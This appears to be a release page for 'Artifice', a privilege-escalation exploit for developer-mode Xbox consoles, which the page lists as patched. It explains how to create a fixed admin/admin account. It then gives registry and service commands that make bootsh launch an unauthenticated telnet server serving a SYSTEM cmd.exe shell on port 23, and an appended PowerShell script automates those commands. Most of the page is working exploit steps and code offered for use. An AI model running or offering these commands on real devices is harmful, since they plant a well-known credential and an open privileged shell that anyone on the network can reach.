| Field | Value |
|---|---|
| Release date | 10.09.2023 |
| Author | Kudayasu |
| Classification | Devmode SystemOS privilege escalation |
| Patched | Yes |
| Patch date | 08/28/2024 |
| First patched system version | 10.0.26100.1968 (xb_flt_2408ge.240821-1830) |
| Source | https://kudayasu.github.io/an-autopsy-of-artifice/ |
| Download | https://github.com/Kudayasu/Artifice/releases/latest |
A complete privilege escalation exploit for Devmode, granting an admin account in SystemOS.
Requirements:
- Windows host computer
- Console in devmode (UWP devkit or higher)
Download the Artifice release, make sure the console is reachable from the host computer, run the program and enter the console's IP address, then launch the exploit.
If it succeeds, an account called admin with password admin is created in SystemOS, and you can SSH into the console with it. Keep in mind that this is a fixed, well-known credential: anyone who can reach the console's SSH service can log in with it, so do not leave the console exposed on an untrusted network.
To gain a SYSTEM shell, leverage bootsh to start a telnet server on the Xbox, as described here. The steps below work by temporarily replacing the command bootsh runs at startup (the Xrun value under its Commands key) with a telnetd invocation, so that starting the service spawns cmd.exe on port 23 with bootsh's SYSTEM privileges.
- SSH into your console using Command Prompt or PowerShell with the admin account created by Artifice.
- Execute the following commands in the SSH session as admin:

  ```cmd
  REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "telnetd.exe cmd.exe 23" /f
  sc start bootsh
  ```

- Wait around 10 seconds so the telnet service has time to start; bootsh reads the Xrun value when it starts, so the value must still hold the telnetd command at that point.
- Reset the Xrun value to its original contents so that the next boot runs SystemBootTasks rather than telnetd:

  ```cmd
  REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "xrun.exe SystemBootTasks" /f
  ```

- Now you can open a telnet session to the console on port 23 using PuTTY or a similar telnet client; the shell it drops you into runs as SYSTEM. The listener is unauthenticated and cleartext, so anyone who can reach port 23 on the console gets the same SYSTEM shell. It lives only as long as the telnetd process; once the Xrun value is restored it is not started again on the next boot.
- Profit.
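The bootsh/telnetd procedure above, scripted from the Windows host as an added example (this is not Artifice's code and not from the original page). It runs the same two REG ADD commands and sc start over SSH, but replaces the blind 10-second wait with a check that port 23 actually opened, and always restores the original Xrun value even if an earlier step failed. Assumptions: the OpenSSH client (ssh.exe) is installed on the host, the console's SSH login shell is cmd.exe (so `&&` chains the two remote commands), Test-NetConnection is available on the host (NetTCPIP module, Windows 8 / Server 2012 and later), and the account is the admin/admin account Artifice creates; ssh prompts for that password once per call, i.e. twice.

```powershell
# Added example, not part of Artifice or the original page: automate the
# bootsh -> telnetd steps over SSH and verify port 23 before restoring Xrun.
# Assumes: ssh.exe on the host, cmd.exe as the console's SSH shell,
# Test-NetConnection available, and the admin/admin account from Artifice.
param(
    [Parameter(Mandatory = $true)][string]$ConsoleIp,
    [string]$User = 'admin'
)

function Test-ConsolePort([string]$Ip, [int]$Port) {
    # TcpTestSucceeded is $true only when a TCP handshake completed.
    (Test-NetConnection -ComputerName $Ip -Port $Port -WarningAction SilentlyContinue).TcpTestSucceeded
}

# Pre-check: the console must be reachable on port 22 or nothing below can work.
if (-not (Test-ConsolePort $ConsoleIp 22)) {
    throw "Console $ConsoleIp is not reachable on port 22 (SSH)."
}

$Target = "$User@$ConsoleIp"

try {
    # Step 1: point bootsh's Xrun value at telnetd and start the service.
    # The stop-parsing token (--%) hands the rest of the line to ssh.exe verbatim on
    # both Windows PowerShell 5.1 and PowerShell 7. ssh joins its arguments with
    # spaces without re-quoting, so the quotes around the /d value are written as \"
    # here; the C runtime turns \" into a literal quote that survives to the console.
    & ssh $Target --% REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d \"telnetd.exe cmd.exe 23\" /f && sc start bootsh
    if ($LASTEXITCODE -ne 0) { throw "Setting Xrun / starting bootsh failed (exit code $LASTEXITCODE)." }

    # Step 2: instead of a fixed 10-second sleep, poll port 23 for up to 30 seconds.
    $telnetUp = $false
    for ($i = 0; $i -lt 15 -and -not $telnetUp; $i++) {
        Start-Sleep -Seconds 2
        $telnetUp = Test-ConsolePort $ConsoleIp 23
    }
    if ($telnetUp) {
        Write-Host "telnetd is listening on ${ConsoleIp}:23 (unauthenticated, cleartext, runs as SYSTEM)."
    } else {
        Write-Warning 'Port 23 never opened; check "sc query bootsh" in an SSH session before retrying.'
    }
}
finally {
    # Step 3: always put the original Xrun value back, even if a step above failed,
    # so the next boot runs SystemBootTasks rather than telnetd.
    & ssh $Target --% REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d \"xrun.exe SystemBootTasks\" /f
    if ($LASTEXITCODE -ne 0) { Write-Warning "Restoring Xrun failed (exit code $LASTEXITCODE); restore it manually over SSH." }
}
```

Run it as `.\Start-ConsoleTelnet.ps1 -ConsoleIp 192.168.1.50` (file name and address are illustrative). The try/finally is the important part: if the console is left with Xrun pointing at telnetd, the next boot starts an unauthenticated SYSTEM shell on port 23 instead of the normal boot tasks, so the restore must run regardless of whether the telnet check passed.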